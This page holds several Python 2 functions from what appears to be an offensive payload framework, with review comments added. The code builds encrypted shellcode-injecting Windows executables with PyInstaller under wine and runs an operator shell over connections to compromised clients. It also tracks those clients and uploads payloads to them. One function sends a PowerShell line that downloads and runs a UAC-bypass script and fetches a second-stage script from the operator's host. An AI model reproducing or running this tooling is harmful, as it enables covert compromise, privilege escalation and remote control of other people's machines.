Ejemplo n.º 1
def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
    """Write payload.py, build it into an .exe with PyInstaller under wine, then pass it to an upload routine.

    ez2read_shellcode is substituted into the SHELLCODE.injectwindows template
    and is also forwarded as powershellExec to DoClientUpload. payloadname
    names the final .exe. The shellcode parameter is not read in this body.

    Files touched: <payloaddir()>/payload.py, dist/payload.exe (relative to
    the current working directory) and <payloaddir()>/<payloadname>.exe.

    Raises KeyboardInterrupt when the build's stderr contains "error".
    """
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        # NOTE(review): redundant, the with-block closes the file on exit.
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'

    # 16 distinct lowercase letters (random.sample draws without replacement).
    # The value is passed as an argv element (--key), so it is visible in the
    # build host's process listing while PyInstaller runs.
    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))

    p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py',
                          '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    # NOTE(review): both pipes are only read after the child exits. If the
    # child fills a pipe buffer it blocks and this loop never ends;
    # p.communicate() would avoid that. `== None` should be `is None`.
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()

    payloadstderr = p.stderr.read()
    # Any occurrence of "error" in stderr, in any case, counts as failure;
    # the process exit code is not consulted.
    if re.search('error', payloadstderr.lower()):
        print t.bold_red + '[*] Error In Creating Payload... Exiting..\n' + t.normal
        sys.stdout.write(payloadstderr)
        # NOTE(review): KeyboardInterrupt is used as the failure signal;
        # presumably a caller catches it - confirm.
        raise KeyboardInterrupt
    # NOTE(review): the path and payloadname are interpolated into a shell
    # command line, so shell metacharacters in either are interpreted by
    # /bin/sh. The return status of `mv` is ignored.
    os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    # Imported here rather than at module level; presumably to avoid a
    # circular import with menu - confirm.
    from menu import clientMenuOptions
    # More than two menu entries selects the client-connection upload path.
    if len(clientMenuOptions.keys()) > 2:
        DoClientUpload(payloaddir(),payloadname,powershellExec=ez2read_shellcode,isExe=True)
    else:
        DoPayloadUpload(payloadname)
Ejemplo n.º 2
def checkUpload():
    """Ask whether to upload over an existing client connection and which one.

    Returns int(clientMenuOptions[<choice>]['params']) for the chosen client,
    or False when the answer is anything other than "y" or an empty line.
    """
    from menu import clientMenuOptions
    answer = prompt_toolkit.prompt(
        '\n[?] Upload Using Client Connection? [y]/n: ',
        patch_stdout=True,
        completer=WordCompleter(['y', 'n']))
    print
    # Empty input counts as the default "y".
    if answer.lower() not in ('y', ''):
        return False

    selectable = []
    for client_id in clientMenuOptions.keys():
        # 'back' and 'r' are menu entries, not clients.
        if client_id in ('back', 'r'):
            continue
        selectable.append(client_id)
        entry = clientMenuOptions[client_id]
        line = t.bold_yellow + client_id + t.normal + ': ' + t.bold_green + entry['payload']
        # NOTE(review): indexes the first two module names; an entry with
        # fewer than two modules raises IndexError here.
        module_names = entry['availablemodules'].keys()
        line += t.bold_yellow + ' | ' + t.bold_green + module_names[0]
        line += t.bold_yellow + ' | ' + t.bold_green + module_names[1] + t.normal
        print line
    print

    prompt_style = prompt_toolkit.styles.style_from_dict(
        {prompt_toolkit.token.Token: '#FFCC66'})
    # Re-prompt until the input names an entry whose 'params' converts to int.
    while True:
        chosen = prompt_toolkit.prompt(
            'Client > ',
            patch_stdout=True,
            style=prompt_style,
            completer=WordCompleter(selectable))
        try:
            return int(clientMenuOptions[chosen]['params'])
        except:
            # NOTE(review): the bare except hides every lookup/conversion error.
            continue
Ejemplo n.º 3
def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
    """Write payload.py, build it into an .exe with PyInstaller under wine, then pass it to an upload routine.

    ez2read_shellcode is substituted into the SHELLCODE.injectwindows template
    and is also forwarded as powershellExec to clientUpload. payloadname names
    the final .exe. The shellcode parameter is not read in this body.

    Files touched: <payloaddir()>/payload.py, dist/payload.exe (relative to
    the current working directory) and <payloaddir()>/<payloadname>.exe.
    """
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        # NOTE(review): redundant, the with-block closes the file on exit.
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'

    # 16 distinct lowercase letters (random.sample draws without replacement),
    # passed as an argv element (--key) and therefore visible in the build
    # host's process listing while PyInstaller runs.
    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))

    p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py',
                          '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    # NOTE(review): both pipes are only read after the child exits. If the
    # child fills a pipe buffer it blocks and this loop never ends;
    # p.communicate() would avoid that. `== None` should be `is None`.
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()

    payloadstderr = p.stderr.read()
    # Build stderr is shown only when the first CLI argument is "-debug".
    if len(sys.argv) > 1:
        if sys.argv[1] == "-debug":
            sys.stdout.write(payloadstderr)
    # NOTE(review): there is no failure check. The move runs and the success
    # message prints even if the build produced nothing. The path and
    # payloadname are interpolated into a shell command line, so shell
    # metacharacters in either are interpreted by /bin/sh.
    os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    from menu import clientMenuOptions
    # More than two menu entries selects the client-connection upload path.
    if len(clientMenuOptions.keys()) > 2:
        from stager import clientUpload
        # The json argument is a template with a %s slot in "data";
        # presumably clientUpload fills it - confirm against stager.
        clientUpload((payloaddir() + '/' + payloadname), powershellExec=ez2read_shellcode, isExe=True, json='{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}')
    else:
        DoPayloadUpload(payloadname)
Ejemplo n.º 4
def interactShell(clientconn,clientnumber):
    """Run an operator prompt that relays typed lines to clientconn and echoes the reply.

    "back" leaves the loop with the connection left open. "exit" leaves the
    loop and, when str(clientnumber) is a key of clientMenuOptions, also
    deletes that entry and closes clientconn. Empty input re-prompts. Any
    other line is sent unchanged. Always returns True.
    """
    from menu import clientMenuOptions
    print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24

    while True:
        command = raw_input("PS > ")
        if command == "back":
            break
        elif command == "" or command == "\n":
            continue
        elif command == "exit":
            # The connection is closed only when the client is still
            # registered; otherwise the loop simply ends.
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
            break
        else:
            clientconn.sendall(command)

        # Echo the reply one byte at a time; a NUL byte ends the reply
        # (the NUL itself is written to stdout before the check).
        # NOTE(review): if clientconn is a plain socket, recv(1) returns ''
        # once the peer has closed, which never equals "\x00", so this loop
        # would spin forever. Peer-supplied bytes, terminal control sequences
        # included, are written to the operator's terminal unfiltered.
        while True:
            data = clientconn.recv(1)
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                # Dead store: data is reassigned before its next use.
                data = ''
                break
    return True
Ejemplo n.º 5
def interactShell(clientconn,clientnumber):
    """Run an operator prompt that relays typed lines to clientconn and echoes the reply.

    "back" leaves the loop with the connection left open. "exit" leaves the
    loop and, when str(clientnumber) is a key of clientMenuOptions, also
    deletes that entry, closes clientconn and sleeps two seconds. Empty input
    sends a newline. Any other line is sent unchanged. Always returns the
    string "clear".
    """
    computerName = ""
    from menu import clientMenuOptions
    print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24
    while True:
        # Collect whatever the peer sends within 0.2 s before prompting.
        # NOTE(review): computerName is never reset, so the whole accumulated
        # text is printed again each time more data arrives. If clientconn is
        # a plain socket that the peer has closed, select keeps reporting it
        # readable and recv returns '', so this loop would not terminate.
        while clientconn in select.select([clientconn], [], [], 0.2)[0]:
            computerName += clientconn.recv(2048)
            if len(computerName) > 1:
                print t.bold_yellow + computerName + t.normal

        command = raw_input("> ")
        if command == "back":
            break
        elif command == "":
            clientconn.sendall("\n")
        elif command == "exit":
            # The connection is closed only when the client is still
            # registered; otherwise the loop simply ends.
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
                time.sleep(2)
            break
        else:
            clientconn.sendall(command)

        # Echo the reply one byte at a time, dropping carriage returns; a NUL
        # byte ends the reply (the NUL itself is written to stdout first).
        # NOTE(review): an empty read (peer closed) never equals "\x00", so
        # this loop would spin. Peer-supplied bytes reach the operator's
        # terminal unfiltered.
        while True:
            data = clientconn.recv(1).rstrip('\r')
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                break
    return "clear"
Ejemplo n.º 6
def interactShell(clientconn, clientnumber):
    """Relay operator input to clientconn and print what comes back.

    Commands handled locally: "back" (leave, connection stays open) and
    "exit" (leave; if str(clientnumber) is registered in clientMenuOptions,
    unregister it, close clientconn and wait two seconds). An empty line is
    sent as "\\n"; everything else is sent verbatim. Returns "clear".
    """
    computerName = ""
    from menu import clientMenuOptions
    print "Commands\n" + "-" * 24 + "\nback - Background Shell\nexit - Close Connection\n" + "-" * 24
    while True:
        # Read any data that arrives within 0.2 s and show it before the
        # prompt.
        # NOTE(review): the buffer only grows, so earlier text is reprinted
        # with every new chunk. With a plain socket whose peer has closed,
        # select reports readable and recv returns '', which keeps this loop
        # running indefinitely.
        while clientconn in select.select([clientconn], [], [], 0.2)[0]:
            computerName += clientconn.recv(2048)
            if len(computerName) > 1:
                print t.bold_yellow + computerName + t.normal

        command = raw_input("> ")
        if command == "back":
            break
        elif command == "":
            clientconn.sendall("\n")
        elif command == "exit":
            # An unregistered client is left unclosed.
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
                time.sleep(2)
            break
        else:
            clientconn.sendall(command)

        # Byte-wise echo with '\r' removed, terminated by a NUL byte.
        # NOTE(review): no handling for an empty read, so a closed peer makes
        # this loop spin; output is written to the terminal without filtering.
        while True:
            data = clientconn.recv(1).rstrip('\r')
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                break
    return "clear"
Ejemplo n.º 7
def GeneratePayload(ez2read_shellcode,payloadname,shellcode):
    """Write payload.py, build it into an .exe with PyInstaller under wine, then pass it to an upload routine.

    ez2read_shellcode is substituted into the SHELLCODE.injectwindows template
    and is also forwarded as powershellExec to DoClientUpload. payloadname
    names the final .exe. The shellcode parameter is not read in this body.

    Raises KeyboardInterrupt when the build's stderr contains "error".
    """
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        # NOTE(review): redundant, the with-block closes the file on exit.
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'

    # 16 distinct lowercase letters, passed to the build as an argv element.
    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))
    # NOTE(review): the interpreter path is hard-coded under /root, so the
    # build only works when the wine prefix lives in root's home directory.
    p = subprocess.Popen(['wine', '/root/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py',
                          '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    # NOTE(review): the pipes are not drained while waiting; a child that
    # fills a pipe buffer blocks and this loop never ends. `== None` should
    # be `is None`.
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()

    payloadstderr = p.stderr.read()
    # Failure is inferred from the word "error" in stderr, not the exit code.
    if re.search('error', payloadstderr.lower()):
        print t.bold_red + '[*] Error In Creating Payload... Exiting..\n' + t.normal
        sys.stdout.write(payloadstderr)
        # NOTE(review): presumably caught by a caller as an abort - confirm.
        raise KeyboardInterrupt
    # NOTE(review): shell command built by string interpolation; shell
    # metacharacters in the directory or payloadname are interpreted by
    # /bin/sh, and the status of `mv` is ignored.
    os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    from menu import clientMenuOptions
    # More than two menu entries selects the client-connection upload path.
    if len(clientMenuOptions.keys()) > 2:
        DoClientUpload(payloaddir(),payloadname,powershellExec=ez2read_shellcode,isExe=True)
    else:
        DoPayloadUpload(payloadname)
Ejemplo n.º 8
def checkClientUpload(payloadname, powershellExec, isExe):
    """Upload through a client connection when one is registered.

    Returns True after calling DoClientUpload. With two or fewer entries in
    clientMenuOptions it prints powershellExec and returns False instead.
    """
    from menu import clientMenuOptions
    # Presumably the two baseline entries are the 'back' and 'r' menu items;
    # confirm against menu.
    if len(clientMenuOptions) <= 2:
        print powershellExec
        return False
    DoClientUpload(payloaddir(), payloadname, powershellExec, isExe)
    return True
Ejemplo n.º 9
def GeneratePayload(ez2read_shellcode, payloadname, shellcode):
    """Write a randomly named script, build it into an .exe with PyInstaller under wine, then pass it to an upload routine.

    ez2read_shellcode is substituted into the SHELLCODE.injectwindows template
    and is also forwarded as powershellExec to clientUpload. The payloadname
    and shellcode parameters are not read in this body; every output file is
    named after the random eight-letter randoFileName.

    Returns True on success, False when moving the built .exe raises OSError.
    """
    # Eight distinct lowercase letters (random.sample draws without
    # replacement).
    randoFileName = ''.join(random.sample(string.ascii_lowercase, 8))
    with open('%s/%s.py' % (payloaddir(), randoFileName), 'w+') as Filesave:
        Filesave.write(
            do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
        # NOTE(review): redundant, the with-block closes the file on exit.
        Filesave.close()
    print '[*] Creating Payload using Pyinstaller...'

    # The child inherits the current environment plus WINEARCH/WINEPREFIX
    # pointing at a 32-bit prefix in ~/.win32.
    p = subprocess.Popen([
        'wine',
        os.path.expanduser('~') + '/.win32/drive_c/Python27/python.exe',
        '/opt/pyinstaller/pyinstaller.py',
        '%s/%s.py' % (payloaddir(), randoFileName), '--noconsole', '--onefile'
    ],
                         env=dict(
                             os.environ, **{
                                 'WINEARCH': 'win32',
                                 'WINEPREFIX':
                                 os.path.expanduser('~') + '/.win32'
                             }),
                         bufsize=1024,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    # NOTE(review): the pipes are not drained while waiting; a child that
    # fills a pipe buffer blocks and this loop never ends. `== None` should
    # be `is None`.
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()

    payloadstderr = p.stderr.read()
    # Build stderr is shown only when the first CLI argument is "-debug".
    if len(sys.argv) > 1:
        if sys.argv[1] == "-debug":
            sys.stdout.write(payloadstderr)
    # A missing dist/<name>.exe is the only build-failure signal.
    # NOTE(review): os.rename can also raise OSError when source and
    # destination are on different filesystems, which would be reported here
    # as a build error.
    try:
        os.rename('dist/%s.exe' % randoFileName,
                  '%s/%s.exe' % (payloaddir(), randoFileName))
    except OSError:
        print t.bold_red + "[!] Error while creating payload..." + t.normal
        print payloadstderr
        return False

    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (
        payloaddir(), randoFileName) + t.normal
    CleanUpPayloadMess(randoFileName)
    from menu import clientMenuOptions
    # More than two menu entries selects the client-connection upload path.
    if len(clientMenuOptions.keys()) > 2:
        from stager import clientUpload
        # The json argument is a template with a %s slot in "data";
        # presumably clientUpload fills it - confirm against stager.
        clientUpload(
            (payloaddir() + '/' + randoFileName),
            powershellExec=ez2read_shellcode,
            isExe=True,
            json=
            '{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}'
        )
    else:
        DoPayloadUpload(randoFileName)
    return True
Ejemplo n.º 10
def pingClients(clientconn,clientnumber):
    """Poll clientconn every 15 seconds and unregister the client on any error.

    Never returns normally: the polling loop only ends through an exception,
    after which the client is removed from clientMenuOptions (if present) and
    sys.exit(1) is called.
    """
    from menu import clientMenuOptions
    try:
        while 1:
            time.sleep(15)
            # NOTE(review): the byte read here is discarded. If other code
            # reads the same connection, this takes one byte of its data.
            # With a plain socket a cleanly closed peer makes recv return ''
            # rather than raise, so that case is not detected.
            clientconn.recv(1)
    except:
        # NOTE(review): the bare except treats every exception as a
        # disconnect.
        client_key = str(clientnumber)
        if client_key in clientMenuOptions:
            notice = "Client %s Has Disconnected" % clientnumber
            print t.bold_red + notice + t.normal
            del clientMenuOptions[client_key]
        sys.exit(1)
Ejemplo n.º 11
def pingClients(clientconn,clientnumber):
    """Keep reading one byte from clientconn every 15 s; drop the client when that fails.

    On any exception the entry str(clientnumber) is deleted from
    clientMenuOptions when it exists, then sys.exit(1) is raised.
    """
    from menu import clientMenuOptions
    try:
        while True:
            time.sleep(15)
            # NOTE(review): the received byte is thrown away, and an empty
            # read (peer closed, plain socket) does not end the loop.
            clientconn.recv(1)
    except:
        # NOTE(review): bare except; any error at all is reported as a
        # disconnect.
        registered = str(clientnumber) in clientMenuOptions
        if registered:
            text = "Client %s Has Disconnected" % clientnumber
            print t.bold_red + text + t.normal
            del clientMenuOptions[str(clientnumber)]
        sys.exit(1)
Ejemplo n.º 12
def checkUpload():
    """Ask whether to upload over an existing client connection and which one.

    Returns int(clientMenuOptions[<choice>]['params']) for the chosen client,
    or False when the answer is anything other than "y" or an empty line.
    """
    from menu import clientMenuOptions
    answer = raw_input('[?] Upload Using Client Connection? [y]/n: ')
    # Empty input counts as the default "y".
    if answer.lower() not in ('y', ''):
        return False

    for client_id in clientMenuOptions.keys():
        # 'back' and 'r' are menu entries, not clients.
        if client_id not in ('back', 'r'):
            label = t.bold_yellow + client_id + t.normal + ': '
            print label + t.bold_green + clientMenuOptions[client_id]['payload'] + t.normal + '\n'

    # Re-prompt until the input names an entry whose 'params' converts to int.
    while True:
        selection = raw_input('>> ')
        try:
            return int(clientMenuOptions[selection]['params'])
        except:
            # NOTE(review): the bare except hides every lookup/conversion error.
            continue
Ejemplo n.º 13
def DoClientUpload(payloaddir,payloadname,powershellExec,isExe):
    """Prompt for a registered client and pass the payload path to clientUpload.

    Does nothing when the answer is anything other than "y" or an empty line.
    Otherwise lists the clients, loops until a valid key is entered, and calls
    clientUpload with "<payloaddir>/<payloadname>" and that entry's 'params'.
    """
    answer = raw_input(
        '\n[*] Upload Using Client Connection? [y]/n: ')
    # Empty input counts as the default "y".
    if answer.lower() not in ('y', ''):
        return

    from menu import clientMenuOptions
    for client_id in clientMenuOptions.keys():
        # 'back' and 'r' are menu entries, not clients.
        if client_id not in ('back', 'r'):
            label = t.bold_yellow + client_id + t.normal + ': '
            print label + t.bold_green + clientMenuOptions[client_id]['payload'] + t.normal + '\n'

    # Re-prompt until the input is a key that has a 'params' item.
    while True:
        selection = raw_input('>> ')
        try:
            clientnumber = clientMenuOptions[selection]['params']
        except:
            # NOTE(review): the bare except hides every lookup error.
            continue
        break

    target_path = payloaddir + '/' + payloadname
    clientUpload(target_path,clientnumber,powershellExec,isExe)
    print "Allow 20 seconds for payload connection..."
Ejemplo n.º 14
def DoClientUpload(payloaddir,payloadname,powershellExec,isExe):
    """Prompt for a registered client and pass the payload path to clientUpload.

    Does nothing when the answer is anything other than "y" or an empty line.
    Otherwise lists the clients, loops until the chosen entry's 'params'
    unpacks into (clientconn, clientnumber), and calls clientUpload with
    "<payloaddir>/<payloadname>" and that connection.
    """
    answer = raw_input(
        '\n[*] Upload Using Client Connection? [y]/n: ')
    # Empty input counts as the default "y".
    if answer.lower() not in ('y', ''):
        return

    from menu import clientMenuOptions
    for client_id in clientMenuOptions.keys():
        # 'back' and 'r' are menu entries, not clients.
        if client_id not in ('back', 'r'):
            label = t.bold_yellow + client_id + t.normal + ': '
            print label + t.bold_green + clientMenuOptions[client_id]['payload'] + t.normal + '\n'

    # Re-prompt until the lookup and the two-value unpack both succeed.
    while True:
        selection = raw_input('>> ')
        try:
            clientconn, clientnumber = clientMenuOptions[selection]['params']
        except:
            # NOTE(review): the bare except hides lookup and unpack errors
            # alike.
            continue
        break

    target_path = payloaddir + '/' + payloadname
    clientUpload(target_path,clientconn,powershellExec,isExe)
Ejemplo n.º 15
def interactShell(clientconn, clientnumber):
    """Relay operator input to clientconn and print what comes back.

    Commands handled locally, case-insensitively: "back" (leave, connection
    stays open), "exit" (leave; if str(clientnumber) is registered in
    clientMenuOptions, unregister it, close clientconn and wait two seconds)
    and "uacbypass" (send the fixed PowerShell line below). An empty line is
    sent as "\\n"; everything else is sent verbatim. Returns "clear".
    """
    computerName = ""
    from menu import clientMenuOptions
    print "Commands\n" + "-" * 50 + "\nback - Background Shell\nexit - Close Connection\nuacbypass - UacBypass To Open New Admin Connection\n" + "-" * 50
    while True:
        # Read any data that arrives within 0.1 s and show it before the
        # prompt.
        # NOTE(review): the buffer only grows, so earlier text is reprinted
        # with every new chunk. With a plain socket whose peer has closed,
        # select reports readable and recv returns '', which keeps this loop
        # running indefinitely.
        while clientconn in select.select([clientconn], [], [], 0.1)[0]:
            computerName += clientconn.recv(2048)
            if len(computerName) > 1:
                print t.bold_yellow + computerName + t.normal

        command = raw_input(" ")
        if command.lower() == "back":
            break
        elif command.lower() == "uacbypass":
            # Sends one PowerShell line that downloads and runs
            # Invoke-EventVwrBypass.ps1 from the raw.githubusercontent.com URL
            # in the literal, giving it a second download command for p.ps1.
            # That second URL is plain http, built from
            # FUNCTIONS().CheckInternet() and randoStagerDLPort, both of
            # which are defined outside this function.
            clientconn.sendall(
                "IEX (New-Object Net.WebClient).DownloadString(\"https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-EventVwrBypass.ps1\");Invoke-EventVwrBypass -Command \"powershell.exe -c IEX (New-Object Net.Webclient).DownloadString('http://"
                + FUNCTIONS().CheckInternet() + ":" + str(randoStagerDLPort) +
                "/" + "p.ps1" + "')\"")
        elif command == "":
            clientconn.sendall("\n")
        elif command.lower() == "exit":
            # An unregistered client is left unclosed.
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client %s Connection Killed" % clientnumber + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
                time.sleep(2)
            break
        else:
            clientconn.sendall(command)

        # Byte-wise echo with '\r' removed, terminated by a NUL byte.
        # NOTE(review): no handling for an empty read, so a closed peer makes
        # this loop spin; output is written to the terminal without filtering.
        while True:
            data = clientconn.recv(1).rstrip('\r')
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                break
    return "clear"
Ejemplo n.º 16
def interactShell(clientconn,clientnumber):
    """Run an operator prompt that relays typed lines to clientconn and echoes the reply.

    "back" leaves the loop with the connection left open. "exit" leaves the
    loop and, when str(clientnumber) is a key of clientMenuOptions, also
    deletes that entry and closes clientconn. Empty input re-prompts. Any
    other line is sent unchanged. Always returns True.
    """
    from menu import clientMenuOptions
    print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24
    while True:
        # This initial value is overwritten by the first recv before any use.
        data = ''
        command = raw_input("PS >")
        if command == "back":
            break
        if command == "exit":
            # The connection is closed only when the client is still
            # registered; otherwise the loop simply ends.
            if str(clientnumber) in clientMenuOptions.keys():
                print t.bold_red + "Client Connection Killed" + t.normal
                del clientMenuOptions[str(clientnumber)]
                clientconn.close()
            break
        if command == "":
            continue
        clientconn.sendall(command)
        # Echo the reply one byte at a time; a NUL byte ends the reply
        # (the NUL itself is written to stdout before the check).
        # NOTE(review): if clientconn is a plain socket, recv(1) returns ''
        # once the peer has closed, which never equals "\x00", so this loop
        # would spin forever. Peer-supplied bytes reach the operator's
        # terminal unfiltered.
        while True:
            data = clientconn.recv(1)
            sys.stdout.write(data)
            sys.stdout.flush()
            if data == "\x00":
                break
    return True
Ejemplo n.º 17
def checkClientUpload(payloadname, powershellExec, isExe):
    """Upload through a client connection when one is registered, else print the command.

    With more than two entries in clientMenuOptions this calls DoClientUpload;
    otherwise it prints powershellExec. Returns None either way.
    """
    from menu import clientMenuOptions
    # Presumably the two baseline entries are the 'back' and 'r' menu items;
    # confirm against menu.
    if len(clientMenuOptions) <= 2:
        print powershellExec
        return
    DoClientUpload(payloaddir(),payloadname,powershellExec,isExe)